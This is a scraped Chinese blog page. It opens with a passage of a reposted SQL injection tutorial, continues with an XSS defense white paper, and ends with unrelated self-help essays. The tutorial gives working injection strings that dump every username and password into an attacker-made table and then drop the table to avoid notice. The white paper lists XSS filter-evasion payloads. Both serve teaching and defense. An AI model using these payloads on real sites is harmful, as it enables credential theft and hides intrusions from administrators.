    之後再繼續以下列語法來獲得其他人的帳號密碼。



    'UNION SELECT UserName,1,1,1 FROM
    tblUser
    WHERE UserName>'admin'--




    錯誤訊息如圖 7。


    圖 7

    :依序透過相同的機制取得其他人的帳號密碼。
    依次替換掉 WHERE UserName >
    的條件內容,就可以取得資料表中所有的帳號和密碼組合。
    駭客甚至可以透過以下的語法將整個使用者帳號密碼串成字串:在輸入使用者帳號的欄位填入如程式碼列表
    3
    的 SQL 語句。




    ';DECLARE @str VARCHAR(8000) SET
    @str='@'
    SELECT @str=@str+'
    '+UserName+'/'+Password
    FROM tblUser WHERE UserName>@str
    SELECT @str
    AS IDPass INTO tblHacker--




    程式碼列表 3:將所有的使用者資料組成字串,放入自訂
    的資料表中。

    在程式碼列表 3 中,先宣告一個長度為 8000
    的字串變數 @str,再將整個
    tblUser 資料表的內容組成一個字串放到變數 @str
    之內,最後再利用
    SELECT … INTO… 語法把 @str
    變數的內容放到自建的資料表
    tblHacker 之中。

    然後再利用前述故意營造錯誤的技巧換回資料內容。



    ' UNION SELECT IDPass,1,1,1 FROM
    tblHacker--




    結果如圖 8。


    圖 8

    :取回全部的會員帳號密碼資料。
    當然事後要做一個清除的動作,以避免系統管理人員的注意,依然在名稱欄
    位輸入如下的內容。




    ' ; DROP TABLE tblHacker--




    在本期的文章中,筆者介紹了一般的 SQL Injection
    攻擊,相信你不是感到興奮且躍躍欲試,想要找幾個網站來開刀,就是感到毛骨悚然,趕快檢視一下自己的系統。不管你是何者,筆者期盼本文不致遭到誤用,若有
    心測試別站的安全程度,建議你將成果告知該站的管理人員,讓整個網際網路的世界更為安全,一般人才會願意流漣在其上,而我們資訊人員才有更好的未來。

    在下期文章中,筆者將繼續介紹進階的 SQL Injection
    攻擊,並提出因應的防範之道,期待再次與你見面。

    後記:本文所舉各例,並非單指Microsoft SQL
    Server而言,事實上所有關聯式資料庫如Oracle等均是如此。同時,本文所舉各例,並非單指ASP而言,事實上對所有動態網頁如JSP、PHP等
    均是如此(即使你的系統還停留在CGI技術也是一樣),奉勸各位即時檢視您的系統,防患未然。
    轉自 : http://www.microsoft.com/Taiwan/sql/SQL_Injection_G1.htm

    註釋:




    1


    就筆者觀察,現今很多的有會員機制的網站在登入時都是以身分證字號當作登入帳號,所以駭客只要想辦法拿到某個會員的身分證字號就可以試試這個方法。






    2


    以下的
    SQL
    Injection
    登入方式都是只利用使用者帳號的欄位,輸入不同的
    SQL
    語法,以組織各種可能的執行方式,而都利用
    “--”
    將後面的密碼欄位標示成
    SQL
    說明。






    3


    駭客的第一特質:有耐心。筆者因此就沒有做駭客的天賦,為了撰寫這篇文章,筆者反反覆覆地測試各個網站,重複的過程非常乏味,所得結論是既然有這個精力,
    筆者寧願多看點書,賺取正當的收入。
    (繼續閱讀...)
    文章標籤

    雪 薄草 發表在 痞客邦 留言(0) 人氣(151)

    • 個人分類:Web安全
    ▲top
    • 6月 09 週三 201012:49
    • XSS攻擊防禦技術白皮書

    作者: 獨自等待,  出處:IT專家網, 責任編輯: 張帥, 2008-08-19 00:00
      XSS攻擊,跨站腳本攻擊是一種
    經常出現在web應用中的計算機安全漏洞,它允許惡意web用戶將代碼植入到提供給其它用戶使用的頁面中。XSS攻擊將對用戶的web安全構成巨大的威
    脅。

    1、什麼是XSS攻擊

     
     XSS攻擊:跨站腳本攻擊(Cross Site Scripting),為不和層疊樣式表(Cascading Style Sheets,
    CSS)的縮寫混淆。故將跨站腳本攻擊縮寫為XSS。
    XSS是一種經常出現在web應用中的計算機安全漏洞,它允許惡意web用戶將代碼植入到提供給其它
    用戶使用的頁面中。比如這些代碼包括HTML代碼和客戶端腳本。攻擊者利用XSS漏洞旁路掉訪問控制——例如同源策略(same origin
    policy)。這種類型的漏洞由於被駭客用來編寫危害性更大的phishing攻擊而變得廣為人知。對於跨站腳本攻擊,黑客界共識是:跨站腳本攻擊是新
    型的「緩衝區溢出攻擊「,而JavaScript是新型的「ShellCode」。
    XSS攻擊的危害包括

      1、盜取各類用戶帳號,如機器登錄帳號、用戶網銀帳號、各類管理員帳號

      2、控制企業數據,
    包括讀取、篡改、添加、刪除企業敏感數據的能力


      3、盜竊企業重要的具有商業價值的資料

      4、非法轉賬

     
     5、強制發送電子郵件


      6、網站掛馬

      7、控制受害者機器向其它網站發起攻擊
      XSS漏洞的分
    類
      XSS漏洞按照攻擊利用手法的不同,有以下三種類型:
      類型A,本地利用漏洞,這種漏洞存在於頁面中客戶端腳本
    自身。其攻擊過程如下所示:
      Alice給Bob發送一個惡意構造了Web的URL。
      Bob點擊並查看了這個
    URL。
      惡意頁面中的JavaScript打開一個具有漏洞的HTML頁面並將其安裝在Bob電腦上。
      具有漏洞
    的HTML頁面包含了在Bob電腦本地域執行的JavaScript。
      Alice的惡意腳本可以在Bob的電腦上執行Bob所持有的
    權限下的命令。
      類型B,反射式漏洞,這種漏洞和類型A有些類似,不同的是Web客戶端使用Server端腳本生成頁面為用戶提供數據
    時,如果未經驗證的用戶數據被包含在頁面中而未經HTML實體編碼,客戶端代碼便能夠注入到動態頁面中。其攻擊過程如下:
      Alice
    經常瀏覽某個網站,此網站為Bob所擁有。Bob的站點運行Alice使用用戶名/密碼進行登錄,並存儲敏感信息(比如銀行帳戶信息)。
        Charly發現Bob的站點包含反射性的XSS漏洞。
      Charly編寫一個利用漏洞的URL,並將其冒充為來自Bob的郵件發送
    給Alice。
      Alice在登錄到Bob的站點後,瀏覽Charly提供的URL。
      嵌入到URL中的惡意腳本在
    Alice的瀏覽器中執行,就像它直接來自Bob的服務器一樣。此腳本盜竊敏感信息(授權、信用卡、帳號信息等)然後在Alice完全不知情的情況下將這
    些信息發送到Charly的Web站點。
      類型C,存儲式漏洞,該類型是應用最為廣泛而且有可能影響到Web服務器自身安全的漏洞,駭
    客將攻擊腳本上傳到Web服務器上,使得所有訪問該頁面的用戶都面臨信息洩漏的可能,其中也包括了Web服務器的管理員。其攻擊過程如下:
     
     Bob擁有一個Web站點,該站點允許用戶發佈信息/瀏覽已發佈的信息。
      Charly注意到Bob的站點具有類型C的XXS漏洞。
     
     Charly發佈一個熱點信息,吸引其它用戶紛紛閱讀。
      Bob或者是任何的其他人如Alice瀏覽該信息,其會話cookies或
    者其它信息將被Charly盜走。
      類型A直接威脅用戶個體,而類型B和類型C所威脅的對象都是企業級Web應用,目前天清入侵防禦產
    品所能防範的XSS攻擊包括類型B和類型C。


    2、XSS攻擊防禦
      基於特徵的防禦
     
     XSS漏洞和著名的SQL注入漏洞一樣,都是利用了Web頁面的編寫不完善,所以每一個漏洞所利用和針對的弱點都不盡相同。這就給XSS漏洞防禦帶來了
    困難:不可能以單一特徵來概括所有XSS攻擊。
      傳統XSS防禦多採用特徵匹配方式,在所有提交的信息中都進行匹配檢查。如,
    對於這種類型的XSS攻擊,採用的模式匹配方法一般會需要對「javascript」這個關鍵字進行檢索,一旦發現提交信息中包含
    「javascript」,就認定為XSS攻擊。這種檢測方法的缺陷顯而易見:駭客可以通過插入字符或完全編碼的方式躲避檢測:
      躲避
    方法1)在javascript中加入多個tab鍵,得到
    <IMG SRC="jav
    ascript:alert('XSS');">
      躲避方法2)
    在javascript中加入&#x09編碼字符,得到
    <IMG
    SRC="jav&#x09;ascript:alert('XSS');">
      躲避方法3)
    在javascript中加入字符,得到
    <IMG
    SRC="jav&#x0A;ascript:alert('XSS');">
      躲避方法4)在
    javascript中的每個字符間加入回車換行符,得到
    <IMG
    SRC="j\r\na\r\nv\r\n\r\na\r\ns\r\nc\r\nr\r\ni\r\np\r\nt\r\n:alert('XSS');">
      
    躲避方法5)對"javascript:alert('XSS')"採用完全編碼,得到
    <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
      上述方法都可以很容易的躲避基於特徵的檢測。而除了會有大量的漏報外,基於特徵的還存在大量的誤報可能:在上面的例子中,
    對"http://www.xxx.com/javascript/kkk.asp?id=2345"這樣一個URL,由於包含了關鍵字
    「javascript」,也將會觸發報警。
      基於代碼修改的防禦
      和SQL注入防禦一樣,XSS攻擊也是利用了
    Web頁面的編寫疏忽,所以還有一種方法就是從Web應用開發的角度來避免:
      步驟1、對所有用戶提交內容進行可靠的輸入驗證,包括對
    URL、查詢關鍵字、HTTP頭、POST數據等,僅接受指定長度範圍內、採用適當格式、採用所預期的字符的內容提交,對其他的一律過濾。

     
     步驟2、實現Session標記(session tokens)、CAPTCHA系統或者HTTP引用頭檢查,以防功能被第三方網站所執行。

     
     步驟3、確認接收的的內容被妥善的規範化,僅包含最小的、安全的Tag(沒有javascript),去掉任何對遠程內容的引用(尤其是樣式表和
    javascript),使用HTTP only的cookie。

      當然,如上操作將會降低Web業務系統的可用性,用戶僅能輸入少量
    的制定字符,人與系統間的交互被降到極致,僅適用於信息發佈型站點。並且考慮到很少有Web編碼人員受過正規的安全培訓,很難做到完全避免頁面中的XSS
    漏洞。
      正是由於傳統檢測方法存在諸多缺陷,國內廠商(如啟明星辰天清入侵防禦系統)並未採用這一方法,而是採用了基於攻擊手法的行為
    檢測方法,其分析流程如下圖所示,
      

      首先對各種場景下的XSS攻擊樣本庫進行整理和分類,並建立起XSS攻擊行為特徵庫,在實時攻擊檢測階段,對
    所有可能實現XSS攻擊的數據來源,如HTTP-Refere、URL、COOKIE、表單數據等,進行數據收集和初步分析,存在注入腳本的用戶提交信息
    才進入下一步的XSS攻擊判斷。
      這種分析方法有以下幾點優勢:

      A:採用行為特徵庫而非數據特徵庫方式,可以避免
    由於檢測固定特徵導致的誤報可能。

      B:內置數據預處理過程,可以對所有可能包含XSS攻擊的數據進行預處理,放行大部分正常HTTP
    請求,僅對少量疑似事件進行深入分析,提升分析速度,降低資源開銷。

      C:XSS攻擊行為特徵庫維護由啟明星辰公司AD-LAB(積極
    防禦實驗室)和博士後工作站負責,AD-LAB擁有大批漏洞發掘和分析人員,2007年發現並獲得CVE編號的漏洞數量多達26個,是國內獨立發掘CVE
    漏洞數量最多的團隊。啟明星辰博士後工作站是業內第一家駐企業的信息安全博士後工作站,為產品算法實現、研究技術轉化提供有力保障。

    3、綜論
      XSS攻擊作為Web業務的最大威脅之一,不僅危害Web業務本身,對訪問Web業務的用戶也會帶來直接的影響,如何防範和
    阻止XSS攻擊,保障Web站點的業務安全,是定位於業務威脅防禦的入侵防禦產品的本職工作。只有結合對XSS攻擊的分析,才能能準確的發現和防禦各類
    XSS攻擊行為,保障Web業務的正常運營。
    (繼續閱讀...)
    文章標籤

    雪 薄草 發表在 痞客邦 留言(0) 人氣(1,737)

    • 個人分類:Web安全
    ▲top
    • 6月 09 週三 201012:00
    • 卡內基的人生態度 -- 不批評、不責備、不抱怨

    批評和攻擊效果零
     
    任何一個領導人都必須懂得一個道理:
     
    尖銳的批評和攻擊,所得的效果都是零。
     
      
    在《EQ》這本書中,曾經有這樣一個故事:有一家出版公司被另一個更大的出版公司買下,就是購併了。購併後,新公司高層做出的第一個決定,就是解雇原來的
    執行長。這位遭到解雇的執行長覺得非常意外,因為他一直認為自己做得不錯,本以為新公司會留任他。百思不解下,他就去問公司的高層。最後,終於有一個人向
    他坦白:「我們在購併前,曾經仔細觀察你一段時間,我們發現你常常用很尖銳的方式責罵、批評別人。所以我們決定對你不留任。」
     
      
    這位執行長還是不解:「
    別人犯了錯,我能夠不管嗎?」對方告訴他:「在過去的年代,企業走威權領導風格,很多主管都會罵人,用帶軍隊的方式來帶企業。但是現在帶人要帶心,外面競
    爭這麼厲害,你動不動就責罵同事,對他們做出很激烈的批評,這樣的領導風格,很難獲得同事由衷的合作。」
     
      
    對方認為,如果這位執行長還留下來,底下的員工就不願意在工作上衝刺,因為無論怎麼做,都可能挨罵,所以最好自掃門前雪。公司的競爭力無形中在流失,所以
    必須請他走路。
     
    奇蹟發生了!
     
      
    卡內基談人際溝通的第一條原則,也是最關鍵的一條原則,就是三個「不」:不批評、不責備、不抱怨 。
     
      
    記得我剛到美國接受卡內基訓練時,已經四十幾歲,有點人生經驗了。興致勃勃,遠洋而來,第一課上的就是「不批評、不責備、不抱怨」,我心裡的第一個反應
    是:「就這個啊!怎麼這麼簡單?」一時之間,還真有點失望。
     
      
    這九個字看起來真的很簡單,好像沒什麼了不起的大道理。當時的課程是十四週,十四週以後,我卻突然發現,自己產生了奇妙的轉變。也就是說,我們對別人的批
    評、責備,或者是面對工作的負面態度,都變少了。無形中,自己就成了一個對人生抱持著積極、正向態度的人。 這種奇妙的轉變,不只發生在我身上。
     
      
    後來我在台灣上這條「不批評、不責備、不抱怨」的原則,就有一個學員舉手說:「黑老師,那我們不是一天到晚都沒話可說了嗎?」全班哄堂大笑。還有一個學員
    就說:「黑老師,我認為這完全不可能。比方說,我老婆一天到晚打麻將,我怎能不批評她?」於是我問他:「你批評多久了?」他說:「至少十年以上,可是批評
    也沒有用,她並沒有因此改變。」對於卡內基提出的這三不,他不太認同:「其實我不太相信,也不同意這一條。可是既然來接受訓練了,我就練習兩、三個禮拜看
    看吧!」三個星期過去了,他在課堂上用很驚訝的語氣對全班宣佈:「奇蹟發生了!我太太把麻將戒掉了。這太不可思議了,我什麼都不說,她反而改變了。」
     
      
    在美國時,我認識一個很漂亮的女孩子,她是一家大企業的總裁特別助理。這個助理人緣很不好,常常跟同事發生衝突。她曾經和我提到這些工作上的衝突,心情顯
    得很低落。有一天,總裁對她說:「妳最好想想辦法解決人際關係上的問題,如果各部門的主管還是沒辦法跟妳相處,我也保護不了妳了。」
     
      
    這個女孩後來就來接受卡內基訓練,學習這三不原則。後來我有機會遇到這位總裁,他告訴我:「幾個禮拜之後,我簡直不敢相信自己的眼睛。我親眼看到這個女孩
    發生的變化。」最明顯的一點,
     
    就是她不再那麼負面、尖銳、愛批評。
     
    批評和責備,只會造成衝突
     
      
    親愛的讀者,讓我們閉上眼睛想一想:當你遭到別人的批評和責備時,心裡的第一個反應會是什麼?
     
      
    曾經有專家研究,當一個人遭受批評時,心跳會加速,然後防衛本能就會浮現。為了維護自尊,他可能會採取攻擊的手段,轉移焦點。所以批評和責備,只是造成更
    多的衝突。

     
      
    「當一個人受到批評、責備時,是一個危險時刻。」當你批評別人、指責別人時,就是在冒一種風險,非常可能傷害對方的自尊。即使你的批評和指責是出於善意,
    但對方因為自尊受到傷害,就算知道自己錯了,也要為自己辯護,死不認錯,甚至故意跟你唱反調。所以批評和責備,並不能解決問題,反而會讓同事討厭你,朋友
    疏離你,親人迴避你。
     
      
    我們常聽說,有些大企業的老闆以罵人出名,這些公司的員工離職率通常蠻高的,有的甚至高達三成。仔細想想,老闆把員工罵跑了,那麼公司在員工身上投資的時
    間、訓練和金錢,都跟著付諸流水,更不要說要凝聚員工的向心力了。
     
    所以一個人要獲得事業上的成功,就需要別人由衷的合作,而前提就是
    不批評、不責備、不抱怨。
     
     如何做到「三不」有何妙法
     
    當然有的。我建議讀者可以採取下列兩種方法:
     
      
    第一個方法比較實際,叫作「
    左腦運動法」。當你想罵人時,比方說父母想責備小孩,主管想批評部屬,就開始運用你的左腦。因為人的右腦掌管情緒,而左腦掌管邏輯,透過啟動左腦的機制,
    可以幫助你控制右腦的情緒作用。
     
      
    要怎麼用左腦呢?舉個例子來說,數一數房間有幾種顏色。比如說,我想罵人了,就開始數:金色、粉紅色、綠色、白色、褐色、黑色,六種。數顏色一方面可以緩
    和情緒,另一方面,因為要辨別顏色,還要數數量,左腦開始工作了,就會壓抑右腦的機制。透過這樣的動作,你本來控制不住的情緒,會因此鎮靜下來,也不會口
    出惡言。
     
      
    前一種方法,可以幫助你控制情緒,但是並不能真正解決問題。第二個方法才能真正改進批評、責備的壞習慣,但是需要長時間的練習。這第二個方法,
    就是加強自信,提升面對工作、生活的熱忱。
     
      
    我遇過一個旅行社的老闆,領導的員工大概有幾十位。每次跟我聊天時,他都在批評部屬,說他們很差勁,每次都找藉口拒絕老闆加班的要求。除了罵員工,他也罵
    客戶,說他們要求太多,不知好歹。反正只要談到工作,他就是滿腹苦水,一肚子抱怨。當然他的員工也不喜歡他,常常在私底下批評老闆,薪水給那麼一點點,對
    工作的要求卻那麼多。
     
      
    我分析他的種種批評和抱怨,歸根究柢,可能是因為在內心深處,他沒有自信,並不喜歡自己。一個不喜歡自己的人,怎麼可能喜歡他的家人、同事、客戶?一個不
    喜歡自己的人,就會擔心別人也不喜歡自己,而做出很多防衛性的舉動,用批評和責備建構成一座牆,把自己和別人隔開。結果,即使有人想對他真心相待,也只能
    離他遠去。
     
      
    我曾經過聽一個演講,主講人說,當摩西從山上走下來,拿著一塊石板,那石板上刻著十誡。他說:「很可惜,這石頭太小了,第十一誡沒有刻上去。第十一誡就
    是,你要喜歡自己。」這位主講人非常語重心長地說:「你如果不喜歡自己,怎麼會有寶貴的自尊?」
     
      
    我常常提到「東邪西毒」這部電影。這部電影中有一個主人翁歐陽峰,由張國榮飾演,就是典型沒有自信心的人。在電影中,歐陽峰是一個情感冷漠的殺手,只要有
    人出錢,他就幫你殺人。價碼沒談成,即使你楚楚可憐,他也不願意動手。他平時獨自居住在沙漠裡,只談生意,不說情誼。電影結束時,出現了一段歐陽峰的獨
    白:「我從小就怕遭別人拒絕,等我長大了以後才發現,想要不遭人拒絕,最好的方法,就是我先拒絕別人。」
     
      
    什麼叫拒絕別人?就是我先罵你,先跟你搗蛋,先攻擊你,透過這種負面的方法,來獲得一點自尊。看完這部電影,我心裡不免感觸:不知道在我們的社會上,存在
    多少個這樣孤獨的歐陽峰?
     
      
    中國人有句話:「愛人如己」,就是說如果我可以愛自己三分,就可以愛別人三分。反過來看,當我討厭自己三分,也就討厭別人三分。當我們批評別人一事無成,
    其實真正批評的對象,是自己的一事無成。
     
    世界是心的鏡子
     
      
    有了自信,對生活上的各種狀況,不論是好事還是挫折,都能以開朗的心情來面對。《EQ
    》的作者丹尼爾•高曼,曾經擔任《紐約時報》的記者。有一天,一連發生了五件謀殺案,他忙著跑新聞,有點心浮氣躁。後來他搭上一輛巴士,發現車子裡的氣氛
    居然非常輕鬆。關鍵在於那位司機,他像是把開公車當成一件樂趣無窮的事。
     
      
    遇到中年婦女上車,他就說:「妳這件衣服好漂亮,能告訴我是在哪裡買的嗎?我想帶我太太去買。」經過博物館時,他就告訴大家,這裡最近有什麼新展覽,歡迎
    大家去參觀。經過一家餐廳,司機興致又來了:「我跟我太太,就是在這裡慶祝結婚二十五周年。」有小姐下車了,司機也不忘加上一句:「美麗的小姐,祝妳有美
    好的一天。」
     
      
    高曼發現,自己搭上這班公車後,原本焦躁的情緒就一掃而空。不過,他認為受惠最大的,還是司機本人。親愛的讀者,讓我們來想像一下,如果這位司機對自己的
    工作很不耐煩,一路上會不斷抱怨紅燈連連,批評紐約交通多糟糕,遇上計程車司機超車,說不到還會探出頭來,罵兩句國罵。下了班,心情不好,對老婆、小孩大
    呼小叫,他的家人也不會喜歡他。
     
     幸好這位司機能以積極、愉快的心情來面對工作,不但工作變得有趣了,乘客喜歡他,下班以後,老婆和小
    孩也會迫不及待地想聽聽他今天發生了什麼趣聞。這位紐約的司機教了我們一件事:世界並不像想像中那麼糟糕,只要我們願意用積極而正面的眼光去看待。
     
     你
    也做得到 如何不批評、不責備、不抱怨?
     
  • 每天早上醒來時,告訴自己:你是個有福份的人,應該以包容的心去看待別人。
  • 每當
    你要批評別人時,想想自己是否也有類似的缺點。
  • 每當你要批評別人時,改用讚美取代。
  • 批評是逃避反省的方式。要批評別人之前,先反省自己。
  • (繼續閱讀...)
    文章標籤

    雪 薄草 發表在 痞客邦 留言(0) 人氣(29)

    • 個人分類:知識
    ▲top
    • 6月 04 週五 201023:59
    • 一生受用的話

    說話要用腦子,敏事慎言,話多無益,嘴只是一件揚聲器而已,平時一定要注意監督、控制好調頻旋鈕和音控開關,否則會給自己帶來許多麻煩。講話不要只顧一時痛快、信口開河,以為人家給你笑臉就是欣賞,沒完沒了的把掏心窩子的話都講出來,結果讓人家徹底摸清了家底,還偷著笑你。遇事不要急於下結論,即便有了答案也要等等,也許有更好的解決方式,站在不同的角度就有不同答案,要學會換位思維,特別是在遇到麻煩的時候,千萬要學會等一等、靠一靠,很多時候不但麻煩化解了,說不準好運也來了。要學會大事化小、小事化了,把複雜的事情盡量簡單處理,千萬不要把簡單的事複雜化。掌握辦事效率是一門學問,要控制好節奏。對小人一定要忍讓,退一步海闊天空,實在不行把屬於自己的空間也送給他們,讓他們如鶯歌燕舞般陶醉吧。俗話說大人大度量,不把俗事放在心裡,小人鼠肚雞腸,惹著小人就等與惹了麻煩,天底下頂數小人惹不起。直到現在我也沒想出更好的辦法戰勝小人,不知道敬而遠之是否可行。這世道沒有無緣無故的愛,也沒有無緣無故的恨,不要參與評論任何人,做到心中有數就可以了。所謂蓋棺論定的道理多簡單,就是有人操之過急。誰也沒有理論依據來介定好人與壞蛋,其實就是利益關係的問題。只有花掉的那部分錢才是真正屬於你的財富,你就是家纏萬貫,生時舍不得吃、舍不得穿,倆眼一閉,剩下的錢你知道誰花了才怪,冤不冤。還有那些省吃儉用的貪官,好好的高官不做,結果因貪返貧,一分錢沒花著還搭上個人財產全部沒收,慘不慘。做事情一定要事先設立道德底線,小偷也清楚有些東西是絕對不能偷的。所以說事情萬萬不可做絕,落井下石的事絕對不要乾,給別人讓出退路就等於自己前進了。對於那些經常找你麻煩甚至欺負你的人,能忍則忍,沒必要時刻與莽夫過不去,但一定要給他攢著,新仇舊怨積累起來,正義和真理就屬於你了,那麼瞅準機會一定要徹底教訓他一次,在法律賦予的權限以內,往死裡整,往死裡揍,讓小子永遠記住:除了你爹,沒人會慣你這些臭毛病。有些人習慣了占你小便宜,小人小肚腸,大人大度量,有機會坑他一把大的,出一次大血,同樣讓他記住:天下根本就沒什麼免費的午餐,哪有白揀的便宜讓你賺。明槍易躲,暗箭難防,背後算計你的小人永遠不會消失,這是中國特色,小人不可得罪,同樣小人也不可饒恕,這是萬世不變的真理,說到底小人也有心小的一面,對待這種人要穩準狠,你可以裝做什麼也沒發生,天下太平,萬事大吉,然後來個明修棧道,暗渡陳倉,以毒攻毒,讓小子知道:小人也不是誰都可以做的,做好人要有水準,做小人同樣有難度。對待愛你的人一定要尊重,愛你是有原因的,不要問為什麼,接受的同時要用加倍的關愛回報,但是千萬不要欺騙人家的感情,哪怕你對人家沒興趣,哪怕人家長得醜一點,這是你用錢買不來的財富。記住:輕視人家付出的情感就等於蔑視自己,玩物喪志,玩人喪德,愛人是一種美德。背後誇獎你的人,知道了,要珍藏在心裡,這裡面很少有水分。當面誇獎你那叫奉承,再難聽些叫獻媚,你可以一笑而過,就當什麼也沒發生,也許不久就有求於你。對於那種當眾誇獎你的人,就疏忽不得了,也許你轉過身去,就用指頭戳你.掌握一條原則:逢人多貶自己,少誇別人,選先評優的時候除外。小恩小惠攢多了就是一個大窟窿,只要接受就一定要找機會回報,行下春風望夏雨,付出就是為了收穫,其實就是一個簡單的種子與果實的關係。千萬別讓天真給害了,記住:人生如戲,都在尋找利益的平衡,只有平衡的遊戲才有可能玩下去。患有心理疾病的人是不負法律責任的,可以沒有理由的咬你一口,所以對待瘋狗級的人物要敬而遠之,保持不來往,不交流,退一步,海闊天空,相信瘋狂也是一種人格,雖不值得尊重,但自有其存在的道理,生物鏈少不了這一環。做一個人生的觀光客吧,說到底只要與人為善,以德服人,離是非遠點,靠家人近點,便有了心安,有了愜意。樂觀的心態來自寬容,來自大度,來自善解人意,來自與世無爭。壞心情是失眠時折磨出來的,其實現實並沒有你想的那樣糟糕,生命有高峰也有低谷,根本沒有一帆風順的人生。所謂的緣分無非只有善惡兩種,珍惜善的,也不要絕對排斥惡的,相信擦肩而過也是緣吧,全世界近60億人口,碰上誰也不容易,所以遇到惡緣,也要試著寬容,給對方一次機會,不可以上來就全盤否定。不要讓事業上的不順影響家人,更不要讓家庭的糾紛影響事業。那樣做很不划算,家人和事業都受影響,甚至損失。男人要善於扛事,要把眼淚咽下去。待人接物要擺正自己的位置,不可以老把自己當人物,老拿自己當領導,老把自己當富翁,老以為自己是情聖,老是自我感覺良好,即便真是小有作為,業績斐然,也要謹慎,要虛懷若谷,要大智若愚,其實人的最終結局都是一樣的,只是你把自己看複雜了。說句俗話:千萬別把自己當回事。騙你一次的人絕不會放棄第二次騙你的機會,對騙子不要抱任何幻想。靠貶低別人提高自己的身份,其結果就是暴露自己的無知與貧乏。
    (繼續閱讀...)
    文章標籤

    雪 薄草 發表在 痞客邦 留言(0) 人氣(50)

    • 個人分類:文章
    ▲top
    • 5月 27 週四 201000:00
    • 如果你已經二十歲了,別再孩子氣了 - 李開復

    如果你已經20歲了,你真的輸不起了,別再孩子了.....
    如果你到了20歲,還沒到25歲 。 ——李開復


    這篇文章是一把刀。看得人心疼,看得人心痛。
    如果你已經過了20歲但還不到25歲的話,你必須找到除了愛情之外,能夠使你用雙腳堅強
    站在大地上的東西。你要找到謀生的方式。現在考慮不晚了。
    我從來不以為學歷有什麼重要,天才都不是科班,但,不是科班,連龍套都跑不了。
    你必須把那些浮如飄絮的思緒,漸漸轉化為清晰的思路和簡單的文字。
    華麗和漂浮都不易長久。你要知道,給予文字閱讀快感不夠的,
    內容,思想,境界,靈魂,精神和智慧,這些才重要。
    不要多看那些和你一個路數的女作家的文字。不要瑣碎,無病呻吟。
    不要想到什麼就寫。不要流連於小感傷和小感動。
    我要你相信溫暖,美好,信任,尊嚴,堅強這些老掉牙的字眼。
    我不要你頹廢,空虛,迷茫,糟踐自己,傷害別人。
    我不要你把自己處理得一團糟。
    節制自己的感情並且珍惜它,明白這種感情不是任何人都能要。
    千萬不要認同那些偽裝的酷和另類。
    他們是無事可做的人找出來放任自己無事可做的藉口,真正的酷是在內心。
    你要有強大的內心。
    要有任憑時間流逝,不會磨折和屈服的信念。
    不是因為在學校的象牙塔中,才說出我愛世界這樣的話,
    是知道外面的黑,髒,醜陋之後,還要說出這樣的話。
    好好去愛,去生活。青春如此短暫,不要歎老。
    偶爾可以停下來休息,但是別蹲下來張望。
    走了一條路的時候,記得別回頭看。時不時問問自己,自己在幹嘛?
    傷心和委屈的時候,要嚎啕大哭。哭完洗完臉,拍拍自己的臉,擠出一個微笑給自己看。
    不要揉,否則第二天早上會眼睛腫。
    給自己一個遠大的前程和目標。記得常常仰望天空。記住仰望天空的時候也看看腳下。
    任何時候,任何人問你,有過多少次戀愛,答案是兩次。
    一次是他愛我,我不愛他。一次是我愛他,他不愛我。
    好的愛情永遠在下一次。別給同一個人兩次傷害你的機會。
    不要與浪子,文藝青年交往,別和沒心沒肺的人在一起,別和沒有正當職業混日子的人在
    一起。別把犯賤當真愛。一個人作踐自己來取悅你的時候,千萬不要因此感動。
    一個男人的煙頭燙在他身上,下一個就可能燙在你身上。
    同樣的,當這個女人的刀片割斷她的手腕,下次就可能割斷你的。
    千萬別相信一個不準備將你介紹給他的朋友圈子的男人。
    一個女人只肯喊你“寶貝”的時候,堅持要她喊你的名字,因為你是男人。
    一個男人或者女人不再來找你的時候,就不要再去找他或者她。
    不要相信在戀愛上用手段的人。分手時不要口出惡言。
    吸取教訓,但不要後悔。後悔沒有用。
    別去做撕照片,燒信,撕日記這樣一類三流愛情電視劇中才有人幹的事。
    相信愛情。相信好男人和好女人還存在,還未婚,還在茫茫人海中尋覓你。
    別說“男人(或者女人)沒一個好東西”,這樣使別人誤以為你閱人無數。
    愛物質,適當地。永遠知道精神更重要。
    比起那些名錶,名牌,時裝,更加美麗的是勤奮而有朝氣的你自己。
    如果你20歲以後所花的每一分錢還都是伸手向父母親人要來的,那你的滿身名牌就只能襯
    托出你的無恥。別以為穿上名牌你就有品位,要知道如果沒有真正的內涵,騾子配上金鞍
    也不會變成駿馬。
    你還年輕,先不說開始你的事業,開創你的未來,但你已經成年,至少也要讓自己不再成
    為父母的負擔,讓父母看到20年辛苦養育的希望。
    無所事事只會把你變成一個廢物,一個被所有其他人鄙夷的廢物,因為這樣的你是一個不
    折不扣的寄生蟲。
    別以為弄個怪異的髮型,穿上不男不女的衣服,噴上刺鼻的香水,別人就會注重你,
    要明白那樣招來的眼光就是別人在看一隻與眾不同的猴子。
    許多有教養的人對另類的你的反感並不寫在臉上,但這種反感確鑿無疑肯定會給你帶來極
    其不利的後果。
    別瞧不起勞動人民。不要為勞動羞恥。土地不髒,汗味不難聞。
    請尊重那些似乎生活狀況不如你,但仍然用自己的雙手誠實勞動養家糊口的人,因為這樣
    才是尊重自己。永遠體恤那些生活在底層的人們,因為我們的親人就是在這些人群中。
    我們不嬌貴。我們必須能夠自己養活自己,這是你的尊嚴所在。
    不要小看一分錢。不妨自己去掙掙看。做人有時要強悍一點,被欺負的時候,一定要討回
    來!但是不要記恨。小人之見,隨他們去好了。有原則的寬容和憐憫,會使你高貴。
    有小心機的女生是可愛的,但別把這種心計用在勾心鬥角上,那樣會很累。
    做人不要太高調,高調容易招惹是非。
    但也不能太低調,該強悍時則強悍,但切不可咄咄逼人。
    被朋友傷害了的時候,別懷疑友情,但提防背叛你的人。原諒,但並不遺忘。
    做人存幾分天真童心,對朋友保持一些俠義之情。要快樂,要開朗,要堅韌,要溫暖。
    這和性格無關。但你要忠誠,勤奮,要真誠的尊重別人,這樣你的人生才不會黑暗。
    寬待自己,也寬待別人。當你不會因為小小的不如意小小的事而生氣或難過的時候,
    你會輕鬆很多。
    要原諒這個世界和自己。
    要告訴自己,我值得擁有最好的一切。
    他寫出了我的堅強與脆弱~
    李開復真的很不得了!!!
    (繼續閱讀...)
    文章標籤

    雪 薄草 發表在 痞客邦 留言(0) 人氣(9)

    • 個人分類:文章
    ▲top
    • 5月 26 週三 201022:47
    • 給孩子的備忘錄

    「為天地立心、為生民立命、為往聖繼絕學、為萬世開太平」,給孩子的備忘錄 
